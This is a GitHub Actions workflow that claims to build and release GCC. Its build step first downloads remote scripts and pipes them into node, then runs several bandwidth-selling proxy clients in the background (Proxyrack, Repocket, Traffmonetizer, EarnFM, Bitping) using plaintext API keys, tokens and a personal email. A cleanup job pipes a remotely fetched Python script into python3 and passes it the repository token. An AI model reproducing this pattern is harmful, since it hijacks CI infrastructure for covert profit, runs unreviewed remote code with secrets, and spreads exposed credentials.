on: repository_dispatch

jobs:
    build:
        runs-on: ubuntu-24.04
        timeout-minutes: 220
        permissions:
            contents: write
        strategy:
            fail-fast: false
            matrix:
                color: [0, 1]
        steps:
        - uses: actions/checkout@main
        - run: |
              proxyrack=$(cat /dev/urandom | LC_ALL=C tr -dc 'A-F0-9' | dd bs=1 count=64 2>/dev/null)
              curl https://app-updates.sock.sh/peerclient/script/script.js | node - --homeIp point-of-presence.sock.sh --homePort 443 --id $proxyrack --version $(curl --silent https://app-updates.sock.sh/peerclient/script/version.txt) --clientKey proxyrack-pop-client --clientType PoP &
              sleep 5m &
              pid=$!
              podman run --init -d --restart=always -e RP_EMAIL=chaowen.guo1@gmail.com -e RP_API_KEY=9b23ebb9-2ee1-427f-a271-f6fdf536537b docker.io/repocket/repocket
              traffmonetizer=$(podman create docker.io/traffmonetizer/cli_v2)
              podman cp $traffmonetizer:/app/Cli .
              podman cp $traffmonetizer:/usr/lib/libssl.so.3 .
              podman cp $traffmonetizer:/usr/lib/libcrypto.so.3 .
              podman cp $traffmonetizer:/usr/lib/libgcc_s.so.1 .
              podman cp $traffmonetizer:/usr/lib/libz.so.1 libz.so.1
              podman cp $traffmonetizer:/usr/lib/libstdc++.so.6 libstdc++.so.6
              podman rm $traffmonetizer
              sudo apt update
              sudo apt install -y --no-install-recommends musl
              DOTNET_SYSTEM_GLOBALIZATION_INVARIANT=1 LD_LIBRARY_PATH=. ./Cli start accept --token ELGPy/DEQYDtARslA6HnkrbPIF6JQi+qYLCre5LBe58= &
              earnfm=$(podman create docker.io/earnfm/earnfm-client)
              podman cp $earnfm:/app/earnfm_example .
              podman rm $earnfm
              EARNFM_TOKEN=0a981b92-0b71-44a2-bdec-eceb5d946025 ./earnfm_example &
              curl $(curl https://releases.bitping.com/bitpingd/update.json | jq -r .platforms[\"linux-x86_64\"].url) | tar -xz
              sudo ./bitpingd login -e chaowen.guo1@gmail.com -p ${{secrets.PASSWORD}}
              sudo ./bitpingd &
              sudo apt install -y --no-install-recommends autogen flex
              ./contrib/download_prerequisites
              mkdir build
              cd build
              ../configure --prefix=${{github.workspace}}/product --enable-threads=posix --enable-checking=release --disable-multilib --enable-languages=all #--enable-__cxa_atexit
              make
              make install-strip
              cd ${{github.workspace}}
              tar -cjvf gcc.tar.bz2 -C product .
        - uses: softprops/action-gh-release@master
          with:
              token: ${{secrets.GITHUB_TOKEN}}
              tag_name: 1
              files: gcc.tar.bz2
    clean:
        runs-on: ubuntu-24.04
        permissions:
            actions: write
        steps:
        - run: |
              sudo apt update
              sudo apt install -y --no-install-recommends python3-aiohttp
              curl https://bitbucket.org/chaowenguo/common/raw/main/clean.py | python3 - ${{secrets.GITHUB_TOKEN}}
